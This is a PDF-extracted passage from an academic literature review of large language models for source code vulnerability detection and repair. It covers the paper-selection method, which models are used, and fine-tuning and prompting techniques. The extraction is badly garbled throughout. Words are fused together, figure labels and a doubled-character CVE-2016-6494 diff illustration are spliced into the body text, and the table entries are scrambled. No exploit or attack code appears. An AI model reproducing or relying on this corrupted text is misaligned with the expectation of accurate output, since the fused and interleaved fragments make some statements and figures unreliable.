limitedspace.Afterconductingtheautomaticsearch,wecollected1,500relevantstudieswiththe automaticsearchfromthese7populardatabases. 3.3 StudySelection InclusionandExclusionCriteria.Afterthepapercollection,weconductedarelevanceassess- mentaccordingtothefollowinginclusionandexclusioncriteria: (cid:33) ThepapermustbewritteninEnglish. (cid:33) Thepapermusthaveanaccessiblefulltext. (cid:33) Thepapermustbeapeer-reviewedfullresearchpaperpublishedeitherinaconferenceproceeding 1 orajournal. (cid:33) ThepapermustadoptLLMtechniquestosolvesourcecodevulnerabilitydetectionorrepair. (cid:37) Thepaperhaslessthan5pages. (cid:37) Books,keynoterecords,panelsummaries,technicalreports,theses,tooldemospapers,editorials,or venuesnotsubjecttoafullpeer-reviewprocess. (cid:37) Thepaperisaliteraturerevieworsurvey. (cid:37) Duplicatepapersorsimilarstudiesauthoredbythesameauthors. 1ForpreprintpapersreleasedonarXivin2023or2024thatarenotyetpublishedduetotheirrecentrelease,wewillretain themwhencheckingthevenuesandwillperformamanualqualitychecktodecidewhethertoincludetheminourstudy. ,Vol.1,No.1,Article.Publicationdate:October2024.6 Zhouetal. 2 8 2 7 2 4 2 3 2 0 1 6 1 2 8 7 4 1 0 0 0 0 0 2 0 1 7 2 0 1 8 2 0 1 9 2 0 2 0 2 0 2 1 2 0 2 2 2 0 2 3 2 0 2 4 s n oi t a cil b u P f o r e b m u N Y e a r Fig.3. DistributionofPublicationsperYear (cid:37) ThepaperdoesnotutilizeLLMs,e.g.,usinggraphneuralnetworks. (cid:37) The paper mentions LLMs only in future work or discussions rather than using LLMs in the approach.
(cid:37) Thepaperdoesnotinvolvesourcecodevulnerabilitydetectionorrepairtasks. Inthefirstphase,byfilteringoutshortpapers(exclusioncriteria1)anddeduplication(exclusion criteria 4), the total number of included papers was reduced to 1,332. In the second phase, we manuallyexaminedthevenue,title,andabstractsofthepapers,andthetotalnumberofincluded papersdeclinedto212.Pleasekindlynotethat,inthisstep,weretainpreprintpapersreleased onarXivin2023or2024thatarenotyetpublishedduetotheirrecentrelease.Books,keynote records,panelsummaries,technicalreports,theses,tooldemopapers,editorials,literaturereviews, orsurveypaperswerealsodiscardedinthisphase(exclusioncriteria2-3).Inthethirdphase,we manuallyreadthefulltextofthepapertoremoveirrelevantpapers.Specifically,thevulnerability detectionorrepairpapers,whichdonotutilizeLLMsbutothermethods,e.g.,graphneuralnetworks (GNN)orrecurrentneuralnetworks(RNN),weredropped(exclusioncriteria5).Wealsoexcluded studiesthatdonotfocusonsourcecodevulnerability,suchasthoseonbinarycode,protocols,or networkcommunication.Furthermore,weremovedstudiesthatjustdiscussedLLMasanideaor futurework(exclusioncriteria6).Wealsoremovedthepapersfocusingonothertasksratherthan vulnerabilitydetectionorrepair,suchasvulnerabledatageneration,vulnerabilityassessment,etc. (exclusioncriteria7).Afterthethirdphase,weidentify82primarystudiesdirectlyrelevanttoour researchtopic. QualityAssessment.Topreventbiasesintroducedbylow-qualitystudies,weformulatedfive QualityAssessmentCriteria(QAC): • QAC1:Wasthestudypublishedinaprestigiousvenue? • QAC2:Doesthestudymakeacontributiontotheacademicorindustrialcommunity? • QAC3:Doesthestudyprovideacleardescriptionoftheworkflowandimplementationofthe proposedapproach? • QAC4:Aretheexperimentdetails,includingdatasets,baselines,andevaluationmetrics,clearly outlined? • QAC5:Dothefindingsfromtheexperimentsstronglysupportthemainargumentspresentedin thestudy? Weemployedascoringsystemrangingfrom0to3(poor,fair,good,excellent)foreachquality assessmentcriterion.Followingthemanualassignmentofscores,weselectedpaperswithtotal scores reaching 12 (80% of the maximum possible score). Please note that for preprint papers releasedonarXivin2023or2024thatarenotyetpublished,theirscoreforthe“venue”criterionis 0.However,iftheirtotalscorereaches12,westillconsidertheminourstudy.Afterthisquality ,Vol.1,No.1,Article.Publicationdate:October2024.LargeLanguageModelforVulnerabilityDetectionandRepair:LiteratureReviewandtheRoadAhead 7 assessment,weobtained42papers.Amongthem,37paperswerepublished,and5high-quality preprintpaperswereincludedafterpassingthequalityassessment. ForwardandBackwardSnowballing.Toavoidomittinganypossiblyrelevantworkduring ourmanualandautomatedsearchprocess,wealsoperformedlightweightbackwardandforward snowballing[108].Thisinvolvedreviewingboththereferencescitedinourselected42primary studiesandthepublicationsthatcitedthesestudies.Asasupplement,wegathered83morepapers and repeated the entire study selection process, including filtering, deduplication, and quality assessment,whichresultedintheidentificationof16additionalpapers.Thus,weobtainedafinal setof58paperstostudy. 3.4 DataExtractionandAnalysis Fig.3illustratesthedistributionofselectedprimarystudiesacrosseachyear.Theearliestrelevant study we identified was published in 2021 [134]. Subsequently, interest in exploring LLMs for vulnerabilitydetectionandrepairhassteadilyincreased,peakingin2024,with46.6%ofthetotal studiedpapers.Thegrowingnumberofpapersonthesetopicsindicatesincreasingresearchinterest inleveragingLLMsforvulnerabilitydetectionandrepair.Wealsoanalyzedthepublicationvenues oftheincludedstudies.ICSEemergesasthepredominantconferencevenueforLLMstudieson vulnerabilitydetectionandrepair,contributing20.7%ofthetotalnumberofstudies.Othernotable venuesareTSE(5.2%),FSE(3.4%),EMSE(3.4%),ISSTA(3.4%),MSR(3.4%),andTOSEM(1.7%). 4 RQ1:WHATLLMSHAVEBEENUTILIZED? Ingeneral,outofthe58includedstudies,weidentified37distinctLLMsthathavebeenutilized. LLMsUsedforVulnerabilityDetection.Fig.4illustratesthedistributionoftheLLMsutilized forvulnerabilitydetection.PleasenotethatwecounttheoccurrenceofLLMsusedineachstudy, andasinglestudymayutilizemultipleLLMs.CodeBERT[23]emergesasthepredominantLLM inaddressingvulnerabilitydetectiontodate,representing26.1%(24/92)ofalltheuseofLLMs intheincludedstudies.GPT-3.5becomesthesecondmostfrequentlystudiedmodel,accounting for9.8%(9/92).RegardingthecategoriesofLLMs,encoder-onlyLLMscomprise47.8%(44/92)of the use of LLMs in the included studies. Following that, decoder-only LLMs account for 23.9% Others CodeBERT 27.2% 25 24 26.1% VulBERTa 3 3.3% 9 GPT-3.5 CodeLlama 4 9.8% 4.3% 4 GCodeBERT GPT-4 8 4.3% 7 8.7% Unixcoder 8 CodeT5 7.6% 8.7% Fig.4. DistributionofLLMsforVulnerabilityDetection
,Vol.1,No.1,Article.Publicationdate:October2024.8 Zhouetal. CodeT5 15.6% 7 Others GPT-3.5 40.0% 18 5 11.1% 4 GPT-4 PLBART 8.9% 2.2% Incoder Seq2seq 4 2.2% 8.9% Codex 2 3 CodeGen 4.4% 6.7% Fig.5. DistributionofLLMsforVulnerabilityRepair Table1. Top10LLMsUsedinVulnerabilityDetectionandRepair Usages VulnerabilityDetection VulnerabilityRepair Ranking LLM Structure Size LLM Structure Size 1 CodeBERT Encoder-only 125M CodeT5 Encoder-Decoder 220M 2 GPT-3.5 Unknown Unknown GPT-3.5 Unknown Unknown 3 GPT-4 Unknown Unknown GPT-4 Unknown Unknown 4 CodeT5 Encoder-Decoder 220M Seq2seq Encoder-Decoder 60M 350M,2.7B, 5 UnixCoder Encoder-only 126M CodeGen Decoder-only 6.1B,16.1B 6 GraphCodeBERT Encoder-only 125M Codex Unknown 12.0B 7B,13B, 7 CodeLlama Decoder-only Incoder Decoder-only 1.3B,6.7B 34B,70B 8 VulBERTa Encoder-only 125M PLBART Encoder-Decoder 406M 9 RoBERTa Encoder-only 125M UnixCoder Encoder-only 126M 10 BERT Encoder-only 109M CodeGPT Decoder-only 124M (22/92),andencoder-decoderLLMsconstitute9.8%(9/92).Lastly,commercialLLMswithundisclosed architectures,suchasGPT-3.5andGPT-4,accountfor18.5%(17/92)oftheLLMusages. LLMs Used for Vulnerability Repair. Fig. 5 illustrates the distribution of LLMs utilized for vulnerabilityrepair.Unlikethedetectiontask,CodeT5[103]emergesasthepredominantLLM in addressing vulnerability repair to date, representing 15.6% (7/45) of the use of LLMs in the includedstudies.GPT-3.5becomesthesecondmostfrequentlystudiedmodel,accountingfor11.1% (5/45).Followingclosely,GPT-4anddomain-specificpre-trainedSeq2SeqTransformersbecomethe thirdmostfrequentlystudiedmodel,accountingfor8.9%(4/45)oftheuseofLLMs.Regardingthe categoriesofLLMs,decoderLLMscomprise31.1%(14/45)ofLLMsused.Followingthat,encoder- decoderLLMsandencoder-onlyLLMsconstitute26.7%(12/45)and6.7%(3/45)oftheuseofLLMs, respectively.Lastly,commercialLLMswithundisclosedarchitectures,suchasGPT-3.5andGPT-4, accountfor35.6%(16/45)oftheLLMusages. Inaddition,Table1presentsthearchitectureandmodelsizesofthetop10mostcommonlyused LLMsinvulnerabilitydetectionandrepair.ThearchitecturesandmodelsizesofGPT-3.5andGPT-4, ,Vol.1,No.1,Article.Publicationdate:October2024.LargeLanguageModelforVulnerabilityDetectionandRepair:LiteratureReviewandtheRoadAhead 9 alongwiththearchitectureofCodex,remainundisclosedduetotheircommercialstatus.Asshown inTable1,theLLMswidelyutilizedforvulnerabilitydetectionarepredominantlylightweight models,withmanyhavingsizesunderorequalto126millionparameters.Mostofthesemodelsare encoder-onlyarchitectures.Incontrast,themodelscommonlyusedforvulnerabilityrepairtendto AAuuttoommaatteedd SSeeaarrcchh belarger,withseveralexceeding1billionparameters,suchasCodeGen[68]andIncoder[24].The majorityofthesemodelshavemorethan126millionparametersandareprimarilydecoder-only andencoder-decoderarchitectures. IIEEEEEE XXpplloorree AACC LLMM iibb rrDD aaii rrgg yyiittaall SSpprriinnggeerrLLiinnkk WWiieellyy SSWW ccee iieebb nn ccoo eeff SScciieenn cccc tteeDDiirree AArrXXiivv LLMs Derive Answer to RQ1: Our anaselayrcshi sstriinngsdicates th11a99t77, ppaatppoeerrssdat2288e55, ppeaappneerrcssod22e6666r pp-aaoppeenrrssly22L0055L ppMaappeesrrssha22v3377e ppaadppeeorrssmi22n2200a pptaaeppeedrrss 9900 ppaappeerrss vulnerabilitydetection,whilecommercialLLMsanddecoder-onlyLLMshavebeenprominent Refine invulnerabilityrepair. search strings Research Question Identify Export 5 RQ2:HOWARELLMSreleAvaDnt vAenPueTsEDFORMaVnuUal SLeNarcEhRABILITYDETECTION? InRQ2,weshiftourfocustoexaminingthespecificadaptationtechniquesofLLMsinvulnerability 1133 SSeelleecctteedd 44 SSeelleecctteedd detection.RegardingtheusageofLLMs,weccoonnsffeeurreennmcceessmarizjjeoouurrnntaahllssreemajorcategoriesfromtheincluded studies:1)fine-tuniVnulgnera[b2ili0ty] ,whichupdatestheparametersofLLMsusingalabeleddataset,2) Detection & Repair 2277 ppaappeerrss 88 ppaappeerrss promptengineering[13],whichdesignspromptstoguideLLMsingeneratingrelevantresponses without updating parameters, and 3) retrieval augmentation (RAG) [47], which integrates knowledge from retrieval systems into the LLMs’ context to improve their performance, also withoutchangingLLMFislte’rp bya rpaagme eters.AsdepictedinFig.6,73%ofthestudiesutilizefine-tuning, limit (pages > 5) while17%and10%employpromptengineeringandretrievalaugmentation,respectively. Inthefollowingsubsection,wewillintroducedetailedcategoriesofLLMadaptationtechniques foreachofthefollowing:1)fine-tuning,2)promptengineering,and3)retrievalaugmentation(RAG). Table2summarizestheexistingLLM-basedmethodsforvulnerabilitydetection. 5.1 Fine-tuning
Fine-tuningisacommonlyusedtechniqueforadaptingLLMstovulnerabilitydetection.Inthis process, labeled code samples, indicating whether they are vulnerable or not, are provided as etaulavE tnemelpmoC Study Identification Manual Search Export 8833 ppaappeerrss FFoorrwwaarrdd BBaacckkwwaarrdd Study selection Export 5500 ppaappeerrss 3333 ppaappeerrss 11,,553355 AAdddd 1166 Total 58 papers ppaappeerrss ppaappeerrss Study Selection Remove Check the venue, Scan full-text to select After quality duplicate studies title, and abstract primary studies assessment 1,387 papers 1,332 papers 212 papers 82 papers 42 papers LLM+ Other Combining with DL Modules Program Analysis Data-centric Innovations Domain-specific Fine-tuning Pre-training (~73%) Default Fine-tuning LLM Usage Causal Learning for Vul. Detection Retrieval Augment- ation (~10%) Prompt Engineering (~17%) Encoder-only LLMs Fig.6. AdaptationTechniquesofLLMsforVul.Detection RQ1 Encoder-decoder only LLMs What LLMs are used? ,Vol.1,No.1,Article.Publicationdate:October2024. Model-centric Decoder-decoder only LLMs Data-Centric Innovations Innovations Domain-specific pretraining Default Fine-tuning Combining with program Domain-specific Fine-tuning analysis Pre-training (~63%) LLM + other DL modules Reinforcement RQ2 Learning How are LLMs used Data-centric designs and augmented in LLM Usage vulnerability detection? Causal learning for Vul. Repair Prompt Engineering LLM for Vulnerability Prompt engineering (~37%) Detection & Repair Retrieval Augmentation Domain-specific pretraining Diverse relevant inputs RQ3 Model-centric designs How are LLMs used and augmented in vulnerability repair? Reinforcement learning Prompt engineering Retrieval Augmentation Vision Challenges and future directions 14 src/mongo/shell/linenoise.cpp @@ -2762,7 +2762,17 @@ int linenoiseHistorySetMaxLen(int len) { 347 347 # Get the HTML fragment inside the appropriate HTML element and then 348 348 # extract the text from it. 349 349 html_frag = extract_text_in(html, u"<div class='lyricbox'>") 350 - lyrics = _scrape_strip_cruft(html_frag, True) 350 + if html_frag: 351 + lyrics = _scrape_strip_cruft(html_frag, True) 351 352 352 - if lyrics and 'Unfortunately, we are not licensed' not in lyrics: 353 - return lyrics 353 + if lyrics and 'Unfortunately, we are not licensed' not in lyrics: 354 + return lyrics 1144 ssrrcc//mmoonnggoo//sshheellll//lliinneennooiissee..ccpppp CCVVEE--22001166--66449944 DDeettaaiill @@@@ --22776622,,77 ++22776622,,1177 @@@@ iinntt lliinneennooiisseeHHiissttoorryySSeettMMaaxxLLeenn((iinntt lleenn)) {{ DDeessccrriippttiioonn 22776622 //** SSaavvee tthhee hhiissttoorryy iinn tthhee ssppeecciiffiieedd ffiillee.. OOnn ssuucccceessss 00 iiss rreettuurrnneedd TThhee cclliieenntt iinn MMoonnggooDDBB uusseess wwoorrlldd--rreeaaddaabbllee ppeerrmmiissssiioonnss oonn ..ddbbsshheellll hhiissttoorryy 22776633 ** ootthheerrwwiissee --11 iiss rreettuurrnneedd.. **// ffiilleess,, wwhhiicchh mmiigghhtt aallllooww llooccaall uusseerrss ttoo oobbttaaiinn sseennssiittiivvee iinnffoorrmmaattiioonn bbyy rreeaaddiinngg 22776644 iinntt lliinneennooiisseeHHiissttoorryySSaavvee((ccoonnsstt cchhaarr** ffiilleennaammee {{ 22776655 -- FFIILLEE&&** ffpp == ffooppeenn((ffiilleennaammee,, ""wwtt""));; tthheessee ffiilleess.. 2 22 27 77 76 66 66 76 7 i i ff ( ( f rf rpp ee t t= u= u== rr n nN N --UUL 1L 1L ;L ;)) {{ WWeeaakknneessss EEnnuummeerraattiioonn 22776688 }} CCCWWWEEE---IIIDDD CCCWWWEEE NNNaaammmeee 22776699 22777700 ffoorr ((iinntt jj == 00;; jj << hhiissttoorryyLLeenn;; ++++jj)) {{ CCCWWWEEE---222000000 EEExxxpppooosssuuurrreee ooofff SSSeeennnsssiiitttiiivvveee IIInnnfffooorrrmmmaaatttiiiooonnn tttooo aaannn UUUnnnaaauuuttthhhooorrriiizzzeeeddd AAAccctttooorrr 22777711 iiff ((hhiissttoorryy[[jj]][[00]] !!== ''\\00'')) {{ 22777722 ffpprriinnttff((ffpp,, ""%%ss\\nn"",, hhiissttoorryy[[jj]]));; 22777733 }} VVuullTTeelllleerr 2 2 22 2 27 7 77 7 77 7 77 7 74 5 64 5 6 - - } f r} f rc ec el tl to uo us rs re ne n( ( f 0f 0p ;p ;));; T hT hiihh ssee ttoo rrFF yyII LL ffiiEE llee ssbb ,, ee aaffoo lllloorree ww ssVV llEE ooRR ccaaSS ll IIOO gguuNN ee ssdd tt oo ttooee ss rr eenn aaoo ddtt ssvv eeee nnrr ssiiff iiyy ttii vvtt eehhaa iitt nn ffuu ooss rrmmee aaoo ttiiff ootthh nnee bb pp yy ee rrrr eemm aaii ddss iiss nnii ggoo nn tthhss eeoo ssnn ee 22777777 }} ffiilleess..10 Zhouetal. Table2. ExistingLLM-basedMethodsforVulnerabilityDetection LLMs LLMAdaptationTechniques Data Deployment Size cD ena tt ra i- c LL PM A+ LL DM L+ TD ro am ina inin g LC eaa ru ns ia nl g D Tuef na iu nl gt Pr Eo nm g.pt RAG GraI nn up lu at rity LaD bea lt ia ng wI in thte Ura sc et rs toIn Wte og rr ka flte od w
✓ ✗ ✗ Ziemsetal.[134] <1B Function synthetic ✓ ✗ ✗ Fuetal.[26] <1B Line heuristic synthetic, ✓ heuristic, ✗ ✗ Hanifetal.[34] <1B Function partially manuallylabeled ✓ ✗ ✗ Thapaetal.[94] <10B Function heuristic ✓ ✗ ✗ Fuetal.[29] >10B Function heuristic ✓ heuristic, ✗ ✗ Wenetal.[106] <1B Function partially manuallylabeled ✓ ✗ ✗ Purbaetal.[76] >1B Function heuristic ✓ partially ✗ ✗ Liuetal.[55] >10B Function manuallylabeled ✓ ✗ ✗ Pengetal.[75] <1B Line heuristic ✓ heuristic, ✗ ✗ Kuangetal.[45] <1B Function partially manuallylabeled ✓ heuristic, ✗ ✗ Zhangetal.[121] <1B Function partially manuallylabeled ✓ partially ✗ ✗ Tangetal.[92] <1B Function manuallylabeled ✓ heuristic, ✗ ✗ Nietal.[64] <1B Function crowd-sourced ✓ ✓ ✗ ✗ Zhouetal.[132] >10B Function heuristic ✓ ✗ ✗ Fuetal.[27] <1B Function heuristic ✓ heuristic, ✗ ✗ Sejfiaetal.[83] <1B Function partially manuallylabeled ✓ ✓ synthetic, ✗ ✗ Wangetal.[99] <1B Function heuristic, manuallylabeled ✓ ✓ heuristic, ✗ ✗ Liuetal.[56] <1B Function partially manuallylabeled ✓ heuristic, ✗ ✗ Rahmanetal.[59] <1B Function partially manuallylabeled <1B, ✓ ✓ heuristic, ✗ ✗ Dingetal.[21] 1-10B, Function partially >10B manuallylabeled synthetic, ✓ Function, heuristic, ✗ ✗ Steenhoeketal.[90] <1B Line partially manuallylabeled ✓ heuristic, ✗ ✗ Khareetal.[43] >1B Function partially manuallylabeled ✓ synthetic, ✗ ✗ Zhangetal.[119] >10B Function heuristic ✓ partiallymanually ✗ ✗ Risseetal.[81] <1B Function labeled, manuallylabeled Steenhoeketal.[89] <1B ✓ Fun Lic nti eon, man,h upe aau lr lr yti is a lt ali l bc y eled ✗ ✗ ✓ heuristic, ✗ ✗ Yangetal.[115] <1B Function partially manuallylabeled ✓ ✗ ✗ Chenetal.[16] <1B Function heuristic ✓ ✗ ✗ Lietal.[50] <1B Function heuristic ✓ heuristic, ✗ ✗ Croftetal.[19] <1B Function manuallylabeled Leetal.[46] <1B ✓ Fun Lic nti eon, manh p ue a au r llr t yii as lt l ali yc b, eled ✗ ✗ Zhouetal.[130] <10B ✓ ✓ Repo manh ue au llr yis lt aic b, eled ✗ ✗ ✓ ✗ ✗ Tranetal.[95] <1B Line heuristic ✓ heuristic, ✗ ✗ Jiangetal[41] <1B Function partially manuallylabeled ✓ heuristic, ✗ ✗ Shestovetal.[87] >10B Function manuallylabeled ✓ ✗ ✗ Nietal[63] >10B Function heuristic ✓ ✗ ✗ Wengetal.[107] <1B Line heuristic ✓ ✗ ✗ Duetal.[22] >10B Function heuristic <1B, ✓ ✗ ✗ Wenetal.[105] 1-10B, Function heuristic >10B ✓ ✗ ✗ XinYin[117] >10B Function heuristic Yangetal.[113] >< 11 0B B, ✓ Function heuristic ✓ ✗ ,Vol.1,No.1,Article.Publicationdate:October2024.LargeLanguageModelforVulnerabilityDetectionandRepair:LiteratureReviewandtheRoadAhead 11 trainingdata.Themodelisthenfine-tunedthroughsupervisedlearning,whereitsparameters areadjustedbasedontheselabeledexamples.Severalvulnerabilitydetectionstudies[16,19,26, 27,46,50,81,83,87,89,94,130]havedirectlyappliedthisdefaultfine-tuningapproachwithout introducing additional designs. In this subsection, we focus on studies that propose advanced fine-tuningtechniquesthatgobeyondthedefaultapproachforimprovedeffectiveness. Thefine-tuningprocessusuallyinvolvesseveralsteps/stages,suchasdatapreparation,model design,modeltraining,andmodelevaluation.Regardingfine-tuning,weclassifyadaptationtech- niques into five groups based on the stages they mainly target: Data-centric innovations (data preparation), Combination with program analysis (data preparation), LLM+ other deep learning modules(modeldesign),Domain-specificpre-training(modeltraining),andCausallearning(training optimization). Data-centricInnovations.Data-centricinnovationsfocusonoptimizingthevulnerabilityde- tectiondatausedforfine-tuningLLMs.Priorstudies[16,19,45,65,115]havefoundthatexisting vulnerabilitydetectiondatacansufferfromimbalancedlabeldistribution,noisyorincorrectlabels, andscarcityoflabeleddata.Researchers[21,45,106,115]haveexploredhowtoaddressthedata issues. • ImbalancedLearning:Toaddresslabelimbalance,i.e.,havingmorenon-vulnerablecodesamples thanvulnerableonesinthedataset,Yangetal.[115]appliedvariousdatasamplingtechniques. Inaddition,Dingetal.[21]up-weightedthelossvaluefortherareclass(i.e.,thevulnerable samples) to pay comparable attention to both vulnerable and clean classes. They found that randomoversamplingonrawcodedataenhancestheabilityoftheLLM-basedvulnerability detectionapproachtolearnrealvulnerablepatterns. • PositiveandUnlabeledLearning:Toaddresslabelqualityissuessuchasnoisyorincorrectlabels, Wenetal.[106]proposedPILOT,whichlearnssolelyfrompositive(vulnerable)andunlabeled dataforvulnerabilitydetection.Specifically,PILOTgeneratespseudo-labelsforselectedunlabeled dataandmitigatesthedatanoisebyusingamixed-supervisionloss. • CounterfactualTraining:Toenhancethediversityoflabeleddata,Kuangetal.[45]proposed perturbinguser-definedidentifiersinthesourcecodewhilepreservingthesyntacticandsemantic structure.Thisapproachgeneratesdiversecounterfactualtrainingdata,whichreferstohypo- theticaldata(e.g.,dataafterperturbingidentifiers)differingfromactualdata(i.e.,datawithout
perturbation),usefulforanalyzingtheeffectofcertainfactors.Incorporatingthesecounterfactual dataenrichesthetrainingdataforLLMs. CombinationofLLMwithProgramAnalysis.ManyLLMsundergopre-trainingonextensive datasets through unsupervised objectives like masked language modeling [20] or next token prediction [78]. For those LLMs, they may prioritize capturing sequential features and could potentially overlook certain structural aspects crucial for understanding code. To address this limitation, several studies have proposed integrating program analysis techniques with LLMs. Theideainvolvesutilizingprogramanalysistoextractstructuralfeatures/relationswithincode, whicharethenincorporatedintoLLMstoenhancetheirunderstanding.Specifically,Liuetal.[56] leveragedJoern[112]tobuildtheASTandPDGofthefunction,leveragingthisdatatopre-train their LLM to predict statement-level control dependencies and token-level data dependencies withinthefunction.Pengetal.[75]utilizedprogramslicingtoextractcontrolanddatadependency information,aidingLLMsinvulnerabilitydetection.Wangetal.[99]proposedtolearnprogram presentationsbyfeedingstaticsourcecodeinformationanddynamicprogramexecutiontraces withLLMs.Additionally,Zhangetal.[121]proposeddecomposingsyntax-basedControlFlow Graphs(CFGs)intomultipleexecutionpathsandfeedingthesepathstoLLMsforvulnerability detection.Tranetal.[95]utilizeaprogramanalysistooltonormalizealluser-definednames,such ,Vol.1,No.1,Article.Publicationdate:October2024.12 Zhouetal. asvariablesandfunctions,intosymbolicnames(e.g.,VAR_1,VAR_2,andFUNC_1)toenhancethe model’srobustnessagainstadversarialattacks.Wengetal.[107]incorporatedinter-statementdata andcontroldependencyinformationintoanLLMbymaskingirrelevantattentionscoresbasedon theprogramdependencygraph,whichresultedinimprovedcoderepresentation. CombinationofLLMwithOtherDeepLearningModules.LLMshavetheirowninherent limitations.Firstly,mostLLMsarebasedontheTransformerarchitecture,whichprimarilymodels sequentialrelationsandfeatures.Secondly,someLLMs(e.g.,CodeBERT)imposerestrictionson thelengthofinputcodesnippets.Forinstance,themostfrequentlyusedLLMinvulnerability detection,CodeBERT,canonlyprocess512tokens.Toaddresstheselimitations,researchershave attemptedtocombineLLMswithotherDLmodules: • LLM+GNN:Toleveragethestructuralfeaturesofcodemoreeffectively,Tangetal.[92]introduced CSGVD,whichemploysgraphneuralnetworks(GNN)toextractthegraphfeaturesofcodeand combinethemwiththefeaturesextractedbyCodeBERT.Jiangetal.[41]parseddataflowgraphs (DFGs)fromtheinputcodeandusedthedatatypesofeachvariableasthenodecharacteristicsof theDFG.TheythenembeddedtheDFGinformationintothegraphrepresentationusingagraph neuralnetwork(GNN)andintegratedthisgraphrepresentationwithalargelanguagemodel.In addition,Yangetal.[113]combinedanLLMwithaGNNmodel.Specifically,theyfirstuseddata flowanalysis(DFA)embeddingstoestablishaGNNmodel.Theythenconcatenatedthelearned embeddingsfromtheGNNwiththehiddenstatesoftheLLM.Byconcatenatingtheembeddings duringeachforwardpass,theyenabledsimultaneoustrainingofboththeLLMandtheGNN. • LLM+Bi-LSTM:ToaddressthelengthconstraintsofLLMs,Ziemsetal.[134]firstsegmentedthe inputcodeintomultiplefixed-sizesegments.TheythenutilizedBERTtoencodeeachsegment andincorporatedaBidirectionalLongShort-TermMemory(Bi-LSTM)moduletoprocessthe outputofBERToneachsegment.Finally,asoftmaxclassifierwasappliedtothelasthiddenstate oftheBi-LSTMtoproducethefinalclassificationscores. Domain-specificPre-training.Domain-specificpre-traininginvolvespre-traininganLLMon dataspecifictoaparticulardomain,suchasvulnerabilitydata,beforefine-tuningitforaspecific taskwithinthatdomain.ThisprocessenablestheLLMtobetterunderstandthedatarelevantto thedomain.Severalstudiesinthefieldofvulnerabilitydetectionhaveadoptedthistechnique[21, 34,56,64,90,99].Thesestudiestypicallyuseoneofthreepre-trainingobjectives: • MaskedLanguageModeling:Thispre-trainingobjectiveinvolvestrainingtheLLMtopredict maskedtokensinacorruptedcodesnippet.HanifandMahmood[34]introducedVulBERTa, which pre-trained a RoBERTa [54] model on open-source C/C++ projects using the Masked LanguageModelingobjective.SinceC/C++istheprogramminglanguageofthevulnerability detection data used to evaluate VulBERTa, this pre-training enhances VulBERTa’s ability to understandC/C++code. • ContrastiveLearning:Thispre-trainingobjectiveistominimizethedistancebetweensimilar functions while maximizing the distance between dissimilar functions. Through contrastive learning,theLLMcanlearntocapturethedistinctivefeaturesofcode.Inparticular,Nietal.[64] andWangetal.[99]utilizeddifferenthiddendropoutmaskstotransformthesameinputfunction intopositivesamples(i.e.,thosesimilartotheinputfunction)whileregardingotherdistinct functionsasdissimilarsamples.Thentheypre-trainedanLLMfollowingthecontrastivelearning objective.Additionally,Dingetal.[21]performedClass-awareContrastiveLearning(CA-CLR) tomaximizetherepresentationsimilaritybetweeneachsampleandtheperturbedversionof
itselfandminimizetherepresentationsimilaritybetweentworandomlychosensamples. • PredictingProgramDependencies:Thispre-trainingobjectiveaimstoenhancetheLLMbyguiding themodeltolearntheknowledgenecessaryforanalyzingdependenciesinprograms.Specifically, ,Vol.1,No.1,Article.Publicationdate:October2024.LargeLanguageModelforVulnerabilityDetectionandRepair:LiteratureReviewandtheRoadAhead 13 Liuetal.[56]pre-trainedanencoder-onlyLLMoncodefromopen-sourceC/C++projectsto predictthestatement-levelcontroldependencyandtoken-leveldatadependency. • AnnotatingVulnerableStatements:Thispre-trainingobjectiveassumesthatimprovingalignment topotentiallyvulnerablestatements(PVS)wouldimprovetheperformanceofthemodel.For example,Steenhoeketal.[90]developedtwoannotationapproaches(i.e.,MarkandPrepend)to giveguidanceorextrainformationtothemodel.Markinsertedspecial“marker”tokensbefore andaftereachtokeninsidethePVS,whilePrependaddedthetokensinsidePVSatthebeginning ofthecode.Thiscanbeconsideredasinsertingdomainknowledgeintothemodel’sinput. Afterthepre-training,thosedomain-specificpre-trainedLLMsundergofine-tuningonthevulnera- bilitydetectiondatasettoperformvulnerabilitydetection. CausalLearning.Althoughpromising,LLMshavebeenfoundtolackrobustnessunderpertur- bationorwhenencounteringout-of-distribution(OOD)data[59].Rahmanetal.[59]suggested thatthisweakrobustnessmaybeattributedtoLLMslearningnon-robustfeatures,suchasvariable names,thathavespuriouscorrelationswithlabels.Toaddressthisissue,Rahmanetal.proposed CausalVul,whichfirstdesignsperturbationstoidentifyspuriousfeaturesandthenappliescausal learningalgorithms,specificallydo-calculus,ontopofLLMstopromotecausal-basedprediction, enhancingtherobustnessofLLMsinvulnerabilitydetection. 5.2 PromptEngineering. Zero-shotPrompting.ResearchershaveattemptedtodeviseeffectivepromptstoguideLLMsin conductingvulnerabilitydetectioninthezero-shotpromptingmanner.Theirpromptengineering designsgenerallyconsistofoneormorecomponentsoutlinedbelow: • TaskDescription.ThispartofthepromptaimstoequipLLMswithvaluabletask-specific informationrelatedtovulnerabilitydetection,clarifyingtheobjectivesthemodelshould achieve (e.g., identifying vulnerabilities in the provided code). Different studies employ varyingtaskdescriptions,andthereisnoconsensusonwhichapproachisoptimal.Specifically, Zhouetal.[132]usedataskdescription:“Ifhasanypotentialvulnerability,output:‘thiscode isvulnerable’.Otherwise,output:‘thiscodeisnon-vulnerable’.Thecodeis[code].Let’sstart:”.Fu etal.[29]proposedataskdescription:“PredictWhethertheC/C++functionbelowisvulnerable. Strictlyreturn1foravulnerablefunctionand0foranon-vulnerablefunctionwithoutfurther explanation.”Purbaetal.[76]devisedataskdescription:“[code]Isthiscodevulnerable?Answer inonlyYesorNo”.“[code]” referstotheinputcodeinthesetaskdescriptions.XinYin[117] usedthetaskdescription:“IwillprovideyouaCcodesnippetandwantyoutotellwhether ithasavulnerability.Youneedtooutput“yes”or“no”first(outputnoifuncertain),andthen explain.” Zhouetal.[130]used“Ifthefollowingcodesnippethasanyvulnerabilities,output Yes;otherwise,outputNo”. • RoleDescription.ThisaimstohelpLLMsshifttheiroperationalmodefromagenerallan- guagemodeltothatofavulnerabilitydetector.Specifically,Zhouetal.[132]definedarole description:“Youareanexperienceddeveloperwhoknowsthesecurityvulnerabilityverywell”. Fuetal.[29]usedaroledescription:“Iwantyoutoactasavulnerabilitydetectionsystem”. Khareetal.[43]utilizedaroledescription: Youareasecurityresearcher”.XinYin[117]used theroledescriptionas:“Iwantyoutoactasavulnerabilityscanner”. • Vulnerability-Related Auxiliary Information. Some studies have integrated vulnerability- relatedauxiliaryinformationintotheirpromptdesignstoenhanceLLMperformance.Specif- ically,Zhouetal.[132]suggestedincludingvulnerablecodeexamplesrepresentingthetop25 